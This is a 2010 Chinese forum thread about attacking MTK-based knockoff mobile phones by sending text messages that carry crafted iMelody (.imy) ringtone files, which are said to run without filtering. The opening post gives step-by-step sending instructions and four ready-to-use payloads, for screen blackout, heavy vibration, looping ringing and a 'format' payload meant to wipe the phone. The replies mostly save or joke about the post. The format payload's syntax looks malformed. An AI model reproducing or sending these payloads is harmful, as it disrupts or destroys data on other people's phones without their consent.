山寨手机的短信攻击

社区服务
高级搜索
猴岛论坛电脑百科山寨手机的短信攻击
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
3个回复

山寨手机的短信攻击

楼层直达
┌.淫穆”

ZxID:10737016

等级: 上将
..

举报 只看楼主 使用道具 楼主   发表于: 2010-05-16 0
影响手机品牌:所有MTK方案手机(也就是我们常说的山寨手机)
且 写短信时有【“选项”——“插入对象”——“我的铃声”】这一功能(大部分山寨手机都有此功能)

漏洞原理:
在大部分MTK方案手机中,编写短信息的时候可以插入一种“imy”格式的铃声文件,
而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声
由于MTK方案手机在阅读短信息的时候对“imy”文件内容不经过过滤而直接执行。
所以我们可以在“imy”文件内插入代码,通过代码调用手机的解码芯片发出一些声音甚至一些核心指令。
通过这种方式可实现对MTK方案手机的短信攻击。

操作方式:
在电脑上新建文本文档,写入代码,保存为“imy”格式文件。
将这个文件放入手机的“Audio”文件夹内。(注意,一定是手机的“Audio”文件夹,而非内存卡上。)
用手机编辑短信,“选项”——“插入对象”——“我的铃声”,选择你写的“imy”文件。
完成,发送...

代码:

黑屏代码:

BEGIN:IMELODY
BEAT:1200
MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)
END:IMELODY

猛震代码:

BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:100
MELODY:(ledoffledonbackoffbackonvibeon@300)
END:IMELODY

振铃代码:

BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200)
END:IMELODY

格式化代码:(慎用)

BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
COMPOSER:MTK(23)Fomat
BEAT:180
MELODY:backoffbackofffbackoffbackoffbackoffbackoffbackoffbackoffbackoff
(+"@9999999999999999999999999">"+<melody>+"@9999999999999999999999999)"
beyond丶駒.

ZxID:10328007

等级: 上尉
弆TM,d【友情】【愛情】...全都給莪滾...
举报 只看该作者 沙发   发表于: 2010-05-16 0
SF  我的  LZ 好邪恶啊
[img][/img]
关闭着的

ZxID:3310981

等级: 中将
隐忍为了爆发

举报 只看该作者 板凳   发表于: 2010-05-16 0
呵呵 收藏了。
cktea

ZxID:10623948

等级: 大尉
举报 只看该作者 地板   发表于: 2010-05-16 0
老掉牙的东西了
« 返回列表
发帖 回复